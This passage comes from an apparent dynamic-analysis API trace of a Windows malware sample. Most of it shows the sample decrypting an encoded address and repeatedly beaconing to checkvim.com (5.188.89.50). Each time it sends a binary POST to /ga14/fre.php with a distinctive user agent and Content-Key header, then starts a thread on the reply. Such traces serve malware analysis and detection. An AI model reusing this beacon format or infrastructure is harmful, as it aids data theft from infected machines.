(lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0210.753] GetProcessHeap () returned 0x840000 [0210.753] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0210.753] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0210.754] GetProcessHeap () returned 0x840000 [0210.755] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b88 [0210.755] socket (af=2, type=1, protocol=6) returned 0x28c [0210.755] connect (s=0x28c, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0210.848] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0210.848] GetProcessHeap () returned 0x840000 [0210.848] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f4f0 [0210.848] GetProcessHeap () returned 0x840000 [0210.848] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0210.849] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0210.850] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0210.850] GetProcessHeap () returned 0x840000 [0210.850] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0210.851] GetProcessHeap () returned 0x840000 [0210.851] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0210.851] GetProcessHeap () returned 0x840000 [0210.851] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f830 [0210.851] GetProcessHeap () returned 0x840000 [0210.851] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0210.851] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0210.853] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0210.853] GetProcessHeap () returned 0x840000 [0210.853] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x87f010 [0210.853] GetProcessHeap () returned 0x840000 [0210.853] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0210.853] send (s=0x28c, buf=0x87f010*, len=237, flags=0) returned 237 [0210.854] send (s=0x28c, buf=0x87eb58*, len=159, flags=0) returned 159 [0210.854] GetProcessHeap () returned 0x840000 [0210.854] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0210.854] recv (in: s=0x28c, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0211.207] GetProcessHeap () returned 0x840000 [0211.207] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f010 | out: hHeap=0x840000) returned 1 [0211.207] GetProcessHeap () returned 0x840000 [0211.207] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0211.207] GetProcessHeap () returned 0x840000 [0211.207] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0211.207] GetProcessHeap () returned 0x840000 [0211.208] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f4f0 | out: hHeap=0x840000) returned 1 [0211.208] closesocket (s=0x28c) returned 0 [0211.208] GetProcessHeap () returned 0x840000 [0211.208] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b88 | out: hHeap=0x840000) returned 1 [0211.208] GetProcessHeap () returned 0x840000 [0211.208] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0211.208] GetProcessHeap () returned 0x840000 [0211.208] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0211.208] GetProcessHeap () returned 0x840000 [0211.208] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0211.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xfcc) returned 0x28c [0211.211] Sleep (dwMilliseconds=0xea60) [0211.212] GetProcessHeap () returned 0x840000 [0211.213] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0211.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.214] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0211.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.224] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff08) returned 1 [0211.263] GetProcessHeap () returned 0x840000 [0211.263] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0211.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.264] CryptImportKey (in: hProv=0x86ff08, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0211.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.283] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0211.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.285] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.285] GetProcessHeap () returned 0x840000 [0211.285] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0211.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.286] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0211.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.287] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0211.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.287] CryptReleaseContext (hProv=0x86ff08, dwFlags=0x0) returned 1 [0211.287] GetProcessHeap () returned 0x840000 [0211.287] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0211.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.288] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0211.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.289] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0211.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.290] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0211.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.291] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0211.291] GetProcessHeap () returned 0x840000 [0211.291] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0211.291] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0211.291] GetProcessHeap () returned 0x840000 [0211.291] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0211.291] GetProcessHeap () returned 0x840000 [0211.291] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0211.291] GetProcessHeap () returned 0x840000 [0211.291] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0211.291] GetProcessHeap () returned 0x840000 [0211.291] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f830 [0211.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.292] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0211.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.304] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f2d0) returned 1 [0211.311] GetProcessHeap () returned 0x840000 [0211.311] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0211.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.312] CryptImportKey (in: hProv=0x86f2d0, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0211.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.313] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0211.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.314] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.314] GetProcessHeap () returned 0x840000 [0211.314] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0211.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.315] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f830, pdwDataLen=0x19f9a4 | out: pbData=0x87f830, pdwDataLen=0x19f9a4) returned 1 [0211.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.316] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0211.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.317] CryptReleaseContext (hProv=0x86f2d0, dwFlags=0x0) returned 1 [0211.317] GetProcessHeap () returned 0x840000 [0211.317] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0211.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.318] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0211.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.320] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0211.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.322] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0211.322] GetProcessHeap () returned 0x840000 [0211.322] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0211.322] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0211.365] GetProcessHeap () returned 0x840000 [0211.365] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871be8 [0211.365] socket (af=2, type=1, protocol=6) returned 0x298 [0211.365] connect (s=0x298, name=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0211.435] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0211.435] GetProcessHeap () returned 0x840000 [0211.435] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f4f0 [0211.435] GetProcessHeap () returned 0x840000 [0211.435] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0211.436] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0211.437] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0211.438] GetProcessHeap () returned 0x840000 [0211.438] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0211.438] GetProcessHeap () returned 0x840000 [0211.438] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0211.438] GetProcessHeap () returned 0x840000 [0211.438] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f998 [0211.438] GetProcessHeap () returned 0x840000 [0211.438] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0211.439] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0211.440] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0211.440] GetProcessHeap () returned 0x840000 [0211.440] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0211.440] GetProcessHeap () returned 0x840000 [0211.440] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0211.440] send (s=0x298, buf=0x873a58*, len=237, flags=0) returned 237 [0211.441] send (s=0x298, buf=0x87eb58*, len=159, flags=0) returned 159 [0211.441] GetProcessHeap () returned 0x840000 [0211.441] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0211.441] recv (in: s=0x298, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0211.909] GetProcessHeap () returned 0x840000 [0211.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0211.909] GetProcessHeap () returned 0x840000 [0211.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0211.909] GetProcessHeap () returned 0x840000 [0211.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0211.909] GetProcessHeap () returned 0x840000 [0211.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f4f0 | out: hHeap=0x840000) returned 1 [0211.909] closesocket (s=0x298) returned 0 [0211.933] GetProcessHeap () returned 0x840000 [0211.933] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0211.933] GetProcessHeap () returned 0x840000 [0211.933] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0211.933] GetProcessHeap () returned 0x840000 [0211.933] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0211.933] GetProcessHeap () returned 0x840000 [0211.933] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0211.933] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xfec) returned 0x298 [0211.934] Sleep (dwMilliseconds=0xea60) [0211.936] GetProcessHeap () returned 0x840000 [0211.936] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0211.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.937] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0211.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.949] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f578) returned 1 [0211.955] GetProcessHeap () returned 0x840000 [0211.955] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0211.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.956] CryptImportKey (in: hProv=0x86f578, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e670) returned 1 [0211.956] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.956] CryptSetKeyParam (hKey=0x87e670, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0211.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.957] CryptSetKeyParam (hKey=0x87e670, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.957] GetProcessHeap () returned 0x840000 [0211.957] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0211.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.958] CryptDecrypt (in: hKey=0x87e670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0211.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.959] CryptDestroyKey (hKey=0x87e670) returned 1 [0211.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.960] CryptReleaseContext (hProv=0x86f578, dwFlags=0x0) returned 1 [0211.960] GetProcessHeap () returned 0x840000 [0211.960] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0211.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.961] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0211.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.962] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0211.962] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.963] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0211.963] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.964] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0211.964] GetProcessHeap () returned 0x840000 [0211.964] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0211.964] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0211.964] GetProcessHeap () returned 0x840000 [0211.964] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0211.964] GetProcessHeap () returned 0x840000 [0211.964] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0211.964] GetProcessHeap () returned 0x840000 [0211.964] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0211.964] GetProcessHeap () returned 0x840000 [0211.964] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0211.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.965] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0211.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.970] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0211.975] GetProcessHeap () returned 0x840000 [0211.975] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0211.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.976] CryptImportKey (in: hProv=0x86f710, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0211.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.977] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0211.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.978] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.978] GetProcessHeap () returned 0x840000 [0211.978] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0211.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.979] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0211.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.979] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0211.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0211.980] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0211.980] GetProcessHeap () returned 0x840000 [0211.980] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0211.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.981] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0211.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.982] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0211.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0211.983] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0211.983] GetProcessHeap () returned 0x840000 [0211.983] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0211.983] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0211.990] GetProcessHeap () returned 0x840000 [0211.990] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c68 [0211.990] socket (af=2, type=1, protocol=6) returned 0x29c [0211.990] connect (s=0x29c, name=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0212.077] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0212.077] GetProcessHeap () returned 0x840000 [0212.077] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fa40 [0212.077] GetProcessHeap () returned 0x840000 [0212.077] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0212.078] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0212.079] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", 